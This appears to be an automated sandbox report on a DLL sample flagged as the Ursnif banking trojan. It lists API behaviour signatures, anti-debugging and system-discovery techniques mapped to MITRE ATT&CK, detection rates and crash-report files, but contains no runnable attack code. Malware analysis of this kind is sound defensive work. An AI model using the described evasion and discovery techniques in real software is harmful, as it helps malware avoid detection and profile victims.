Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E218626 FindFirstFileExA,4_2_6E218626
Source: WerFault.exe, 0000000F.00000002.567770275.0000000004D00000.00000002.00000001.sdmp, WerFault.exe, 00000011.00000002.552696480.0000000005070000.00000002.00000001.sdmp, WerFault.exe, 00000015.00000002.604064037.0000000004F50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 0000000F.00000002.567556542.0000000004C00000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000002.603059974.000000000482F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: WerFault.exe, 0000000F.00000002.567770275.0000000004D00000.00000002.00000001.sdmp, WerFault.exe, 00000011.00000002.552696480.0000000005070000.00000002.00000001.sdmp, WerFault.exe, 00000015.00000002.604064037.0000000004F50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 0000000F.00000002.567770275.0000000004D00000.00000002.00000001.sdmp, WerFault.exe, 00000011.00000002.552696480.0000000005070000.00000002.00000001.sdmp, WerFault.exe, 00000015.00000002.604064037.0000000004F50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 0000000F.00000002.567770275.0000000004D00000.00000002.00000001.sdmp, WerFault.exe, 00000011.00000002.552696480.0000000005070000.00000002.00000001.sdmp, WerFault.exe, 00000015.00000002.604064037.0000000004F50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E1D1EB0 LdrInitializeThunk,LdrInitializeThunk,VirtualProtect,GetWindowsDirectoryA,4_2_6E1D1EB0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E20875F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E20875F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1D1F7C LoadLibraryA,GetProcAddress,3_2_6E1D1F7C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E20DF99 mov eax, dword ptr fs:[00000030h]3_2_6E20DF99
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E24D8B6 mov eax, dword ptr fs:[00000030h]3_2_6E24D8B6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E24D7E5 mov eax, dword ptr fs:[00000030h]3_2_6E24D7E5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E24D3EC push dword ptr fs:[00000030h]3_2_6E24D3EC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E20DF99 mov eax, dword ptr fs:[00000030h]4_2_6E20DF99
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E20462D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6E20462D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E20875F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E20875F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E204901 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E204901
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E20462D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6E20462D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E20875F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6E20875F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E204901 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6E204901
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\lj3H69Z3Io.dll',#1Jump to behavior
Source: rundll32.exe, 00000003.00000002.610065076.0000000003120000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000000.524954099.00000000030C0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000000.525841461.0000000003280000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000003.00000002.610065076.0000000003120000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000000.524954099.00000000030C0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000000.525841461.0000000003280000.00000002.00000001.sdmpBinary or memory string: Progman
Source: rundll32.exe, 00000003.00000002.610065076.0000000003120000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000000.524954099.00000000030C0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000000.525841461.0000000003280000.00000002.00000001.sdmpBinary or memory string: &Program Manager
Source: rundll32.exe, 00000003.00000002.610065076.0000000003120000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000000.524954099.00000000030C0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000000.525841461.0000000003280000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03094454 cpuid 2_2_03094454
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,3_2_6E1D1E8A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_6E21C3CB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6E21C643
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6E21C68E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6E21C729
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6E2134FA
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_6E21CD03
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_6E21CB2F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6E213961
Source: C:\Windows\SysWOW64\rundll32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_6E21C3CB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6E21C643
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6E21C68E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6E21C729
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_6E21C7B6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,4_2_6E21CC36
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6E2134FA
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_6E21CD03
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,4_2_6E21C59A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,4_2_6E21CA06
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_6E21CB2F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,4_2_6E213961
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03096B0F HeapCreate,GetTickCount,GetSystemTimeAsFileTime,SwitchToThread,_aullrem,Sleep,IsWow64Process,2_2_03096B0F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03094454 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,2_2_03094454
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E213009 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,4_2_6E213009
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03094C1B CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,2_2_03094C1B

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsNative API1Path InterceptionProcess Injection12Virtualization/Sandbox Evasion1OS Credential DumpingSystem Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection12LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery33Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 447090 Sample: lj3H69Z3Io.dll Startdate: 12/07/2021 Architecture: WINDOWS Score: 48 27 Multi AV Scanner detection for submitted file 2->27 7 loaddll32.exe 1 2->7         started        process3 process4 9 rundll32.exe 7->9         started        11 rundll32.exe 7->11         started        13 cmd.exe 1 7->13         started        15 2 other processes 7->15 process5 17 WerFault.exe 23 9 9->17         started        19 WerFault.exe 9->19         started        21 WerFault.exe 2 9 11->21         started        23 WerFault.exe 9 11->23         started        25 rundll32.exe 13->25         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
lj3H69Z3Io.dll42%VirustotalBrowse
lj3H69Z3Io.dll6%MetadefenderBrowse
lj3H69Z3Io.dll31%ReversingLabsWin32.Trojan.Ursnif

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
2.2.rundll32.exe.3090000.2.unpack100%AviraHEUR/AGEN.1108168Download File
3.2.rundll32.exe.2a70000.1.unpack100%AviraHEUR/AGEN.1108168Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:32.0.0 Black Diamond
Analysis ID:447090
Start date:12.07.2021
Start time:11:34:57
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 10m 37s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:lj3H69Z3Io.dll
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:22
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal48.winDLL@17/12@0/0
EGA Information:Failed
HDC Information:
  • Successful, ratio: 64% (good quality ratio 58.3%)
  • Quality average: 73.9%
  • Quality standard deviation: 31.5%
HCA Information:
  • Successful, ratio: 88%
  • Number of executed functions: 54
  • Number of non-executed functions: 117
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .dll
Warnings:
Show All
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, wermgr.exe, WMIADAP.exe, conhost.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 168.61.161.212, 52.147.198.201, 13.88.21.125, 23.0.174.200, 23.0.174.185, 104.42.151.234, 95.100.54.203, 40.88.32.150, 52.255.188.83, 13.64.90.137, 20.190.160.74, 20.190.160.131, 20.190.160.5, 20.190.160.68, 20.190.160.9, 20.190.160.72, 20.190.160.7, 20.190.160.130, 20.190.160.135, 20.190.160.70, 20.190.160.1
  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, www.tm.a.prd.aadg.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus15.cloudapp.net, skypedataprdcoleus17.cloudapp.net, login.live.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, www.tm.lg.prod.aadmsa.trafficmanager.net
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

TimeTypeDescription
11:37:35API Interceptor2x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_8e10347d3010a05cec57e2a7338104047e76f62_82810a17_0b7b5422\Report.wer
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):11844
Entropy (8bit):3.772182897781727
Encrypted:false
SSDEEP:192:FvIij0oX0ZyHVFeMjed+C/u7sJS274ItWcV:Oi9XwKVFeMjen/u7sJX4ItWcV
MD5:98764053EC0F511D8C5D96513783CA3D
SHA1:B40C1D4874A55B3691F6919F017472F07B5C07F4
SHA-256:E7264BFE9EC16F603004FCE25B9BDCF28B7DF62B2787B779B3C2A51BC1F13782
SHA-512:9349228CE8477F1957230E07E2668FDCF12CB302471B7CCE5CD840C7AD379C3C62AD353C6026060034A6BF2218FE84B9E83F5C167CBAA4006873B8F466E911C7
Malicious:false
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.0.5.8.8.6.6.2.6.8.8.9.5.3.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.0.5.8.8.6.7.1.3.4.1.5.3.7.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.d.3.1.f.7.2.-.4.4.5.6.-.4.9.7.a.-.b.4.3.4.-.2.2.6.5.b.3.e.6.1.a.a.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.5.9.e.6.1.f.1.-.3.6.6.4.-.4.9.7.2.-.b.e.f.7.-.f.8.8.5.6.0.e.d.4.5.c.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.6.c.-.0.0.0.1.-.0.0.1.7.-.4.1.9.3.-.f.d.c.7.4.c.7.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_8e10347d3010a05cec57e2a7338104047e76f62_82810a17_0feb1257\Report.wer
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):11852
Entropy (8bit):3.7724877771622407
Encrypted:false
SSDEEP:192:pIPtip0oXPZyHVFeMjed+C/u7sJS274ItWc5:UtiHXhKVFeMjen/u7sJX4ItWc5
MD5:9D46E94DE0C102E2B188098887BC46C4
SHA1:72324E1311D110D5BC7AE91020192E7F328B1046
SHA-256:6D5582D44934F0D865C3C291EC1079CF39BEF84CC58C7BEA256459B3E521390E
SHA-512:99D956F51312CA9999FE24C58B0366A5E9C305F55895F270394451D79B46DA0393065410F03DBF3F0958F25CAC2B3FDF2D0A4A47F94ED8520B8ACD271CE92F7B
Malicious:false
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.0.5.8.8.6.4.4.5.0.1.4.5.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.0.5.8.8.6.5.3.0.4.8.2.9.2.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.7.3.c.1.9.f.-.2.5.4.2.-.4.1.6.6.-.a.a.0.b.-.2.5.5.6.5.5.4.8.8.4.5.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.f.7.f.4.f.9.c.-.b.c.3.7.-.4.9.6.1.-.b.9.e.9.-.a.f.b.4.b.3.5.0.0.0.d.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.2.8.4.-.0.0.0.1.-.0.0.1.7.-.6.f.0.f.-.1.f.c.0.4.c.7.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_a0d4b84b30b3d4d6122ce7696ca9e3f4f1b52d_82810a17_1216fb83\Report.wer
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):11476
Entropy (8bit):3.768875643122173
Encrypted:false
SSDEEP:192:Sij0oXXHKvgsv5yjed+f/u7sJS274It7cf:Si9X3Kvgsv5yjeS/u7sJX4It7cf
MD5:73201D26AA92F253283D7E2FA80EA01D
SHA1:9E33A897F2DCE37B89DB00563A4086BB7556FAFC
SHA-256:71E9DD74E26CDADE6B461668A99FDD0605C20A216266864A73348EAB95CCD0CA
SHA-512:943F2925D4808EA255075E83293628CB26631DCF08AB07F32E12B47AB8EE5B6EC578887264E46524B6A6529041A99591EEE1ADE79CDFF41FF03621FF401C1173
Malicious:false
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.0.5.8.8.6.4.4.8.2.5.5.1.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.7.e.3.9.4.2.1.-.5.c.7.2.-.4.f.3.3.-.9.7.b.7.-.5.2.3.f.0.7.3.8.5.c.3.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.1.d.b.7.0.c.f.-.8.b.a.3.-.4.a.f.f.-.a.9.8.8.-.a.b.3.7.c.5.f.b.3.6.8.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.6.c.-.0.0.0.1.-.0.0.1.7.-.4.1.9.3.-.f.d.c.7.4.c.7.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.u.n.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.8.6././.0.1././.3.0.:.1.1.:.4.2.:.4.4.!.1.0.3.d.
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D51.tmp.dmp
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Mon Jul 12 18:37:45 2021, 0x1205a4 type
Category:dropped
Size (bytes):279610
Entropy (8bit):1.6742774830215899
Encrypted:false
SSDEEP:768:eSFnI+naA6a7Q2AsUTusC7lSMWxJ6OXKBMg2VBIwqo:eSFBdAhCxOXKAIdo
MD5:D253E3147DCE1CF34D14F0D50E09528C
SHA1:B24900CE0D71CFBFEC6DF206ECD88E35F673CC45
SHA-256:05BB24CDB6C52AA788043E98B9DD621B3BC9DBE3C7F8FF62ED95A308F23E7565
SHA-512:64B83B9686358846A9E879B7A80BC471AAC954065E46239CF50E8F95AB70544F34F2D6C12915A6C6E2412A0C1728430F3ED3EDE407E1FDAD483353F0C300B486
Malicious:false
Preview: MDMP....... ..........`...................U...........B..............GenuineIntelW...........T.......l......`.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3996.tmp.WERInternalMetadata.xml
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):8288
Entropy (8bit):3.693305788190394
Encrypted:false
